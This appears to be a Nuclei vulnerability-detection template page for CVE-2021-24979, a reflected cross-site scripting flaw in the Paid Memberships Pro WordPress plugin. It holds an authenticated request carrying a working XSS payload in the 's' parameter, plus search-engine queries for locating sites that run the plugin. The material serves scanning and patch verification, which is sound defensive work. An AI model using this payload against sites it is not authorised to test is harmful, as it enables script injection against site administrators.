Paid Memberships Pro < 2.6.6 - Cross-Site Scripting

ID: CVE-2021-24979

Severity: medium

Author: r3Y3r53

Tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios

Description

The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

YAML Source

id: CVE-2021-24979

info:
  name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
  remediation: version 2.6.6
  reference:
    - https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24979
    - https://plugins.trac.wordpress.org/changeset/2632369/paid-memberships-pro/tags/2.6.6/adminpages/discountcodes.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24979
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.40832
    cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: strangerstudios
    product: paid_memberships_pro
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/
    fofa-query: body=/wp-content/plugins/paid-memberships-pro/
    publicwww-query: /wp-content/plugins/paid-memberships-pro/
    google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
  tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
          - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
        condition: and
# digest: 4b0a0048304602210081601790474cc179ed889ea25d0b43ef330ce681361f558c36a819601be89d98022100ffed60ef47907d893ed8bde960b232f0783d67aff0b8f4913d6d616378a54f89:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24979.yaml"

View on Github